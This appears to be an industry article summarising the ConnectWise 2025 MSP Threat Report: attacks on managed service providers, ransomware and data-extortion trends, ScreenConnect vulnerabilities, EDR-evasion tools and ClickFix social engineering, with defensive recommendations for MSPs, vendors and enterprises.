Managed Service Providers (MSPs) have long been part of the cybersecurity supply chain. Now, they have become one of its most attractive targets.
According to the ConnectWise 2025 MSP Threat Report, attackers are increasingly bypassing large, well-defended enterprises and instead compromising MSPs as a force multiplier—using one breach to reach dozens or hundreds of downstream small and midsized business (SMB) customers.
Drawing on millions of EDR and SIEM alerts collected by the ConnectWise Cyber Research Unit (CRU), the report paints a stark picture: MSPs are under sustained, adaptive attack pressure, and threat actors are evolving faster than many service providers—and their clients—can respond.
The report makes clear that MSPs sit at a uniquely dangerous intersection:
They often manage high-privilege remote access tools.
They support many clients with shared infrastructure.
They may have fewer dedicated security resources than large enterprises.
A single compromise can cascade across multiple customer environments.
This dynamic explains why 78% of MSPs surveyed believe a serious cyberattack could put them out of business, and 83% say they plan to increase cybersecurity investment over the next 12 months.
For attackers, MSPs represent efficiency and scale. For defenders, they represent concentration of risk.
But the report emphasizes that this did not reduce ransomware overall. Instead, it fractured the ecosystem:
LockBit offshoots like "NotLockbit" emerged.
New players such as BianLian and CosmicBeetle gained traction.
RaaS models persisted, just with less centralized branding.
Shift toward MSPs and SMBs
Threat actors increasingly targeted mid-sized organizations and MSP-managed environments to avoid scrutiny associated with large enterprise attacks. This expanded the attack surface for MSPs supporting SMBs with limited in-house security maturity.
Data extortion without encryption
A key evolution highlighted in the report is the rise of pure data extortion. Groups like RansomHub stole data without encrypting systems—bypassing controls designed to detect ransomware behavior and still exerting pressure by threatening public disclosure.
For MSPs and their clients, this means:
Backups alone are not sufficient.
Data visibility, access control, and exfiltration detection are critical.
One of the most consequential findings for MSPs involved two critical vulnerabilities in ScreenConnect:
CVE-2024-1708 (path traversal, CVSS 8.4)
CVE-2024-1709 (authentication bypass, CVSS 10)
These flaws allowed attackers to gain unauthorized access to MSP environments—particularly dangerous given the privileged nature of remote access tools. Cloud instances were secured within 48 hours, but unpatched on-premises systems remained heavily exploited, prompting U.S. CISA to add CVE-2024-1709 to its Known Exploited Vulnerabilities catalog.
The lesson is blunt: remote access tools are now high-value attack surfaces, and delayed patching creates cascading client risk.
The report documents more than 84,000 alerts targeting edge device vulnerabilities across MSP-managed environments in 2024 alone, with roughly 60% involving vulnerabilities disclosed that same year.
Common targets included:
VPNs and SSL gateways
Firewalls
Managed file transfer platforms
RDP and exposed remote services
Threat actors increasingly exploit:
Unpatched edge software
Misconfigurations
Weak or reused credentials
Zero-day vulnerabilities in perimeter technologies.
For MSPs, edge security failures can become supply chain attacks by default, enabling lateral movement into customer networks.
One of the most alarming trends is the rise of purpose-built "EDR killer" tools. The ConnectWise CRU observed widespread use of techniques designed to disable or evade endpoint detection before deploying payloads.
Tools and techniques documented include:
BYOVD (Bring Your Own Vulnerable Driver) attacks
Kernel-level exploits
Abuse of legitimate utilities such as TDSSKiller
Tools like EDRKillShifter, Terminator, AuKill, EDRSilencer, and EDRSandBlast
These techniques allow attackers to persist undetected, exfiltrate data, and deploy ransomware with minimal resistance.
Implication: EDR alone is no longer sufficient. MSPs and enterprises must integrate tamper protection, network telemetry, SIEM correlation, and zero-trust principles.
Drive-by compromise accounted for 22% of all incidents reviewed in 2024, with a sharp rise in a new social-engineering technique known as ClickFix.
Instead of asking victims to download files, attackers trick users into:
Opening the Run prompt or PowerShell
Copy-pasting a command disguised as a CAPTCHA fix or browser update
Executing malware using native system tools
Because there is no effective way to scan what users copy and paste, ClickFix attacks bypass many traditional defenses, especially in poorly trained environments.
MSPs are no longer just service providers—they are critical infrastructure in the SMB economy.
Key takeaways:
MSP security posture directly determines client security posture.
Patch management and vulnerability remediation must be treated as existential priorities.
Security tooling must be layered, monitored, and resilient against evasion.
Incident response readiness must account for multi-tenant impact.
As the report notes, threat actors will continue targeting MSPs precisely because of their leverage.
For vendors selling into the MSP ecosystem, the report signals several imperatives:
Security by default in remote access and management tools
Faster patch cycles and transparent disclosure processes
Built-in telemetry, tamper protection, and abuse detection
Tooling designed for scale, automation, and multi-customer environments
Vendors that fail to account for MSP-specific risk may unintentionally become part of the attack chain.
Enterprises relying on MSPs must recognize:
MSP compromise is a first-order risk, not a third-party afterthought.
Due diligence should include MSP patching cadence, EDR strategy, and incident response maturity.
Shared responsibility models must be explicit and enforced contractually.
Security leaders should treat MSP relationships with the same scrutiny applied to cloud providers or SaaS vendors.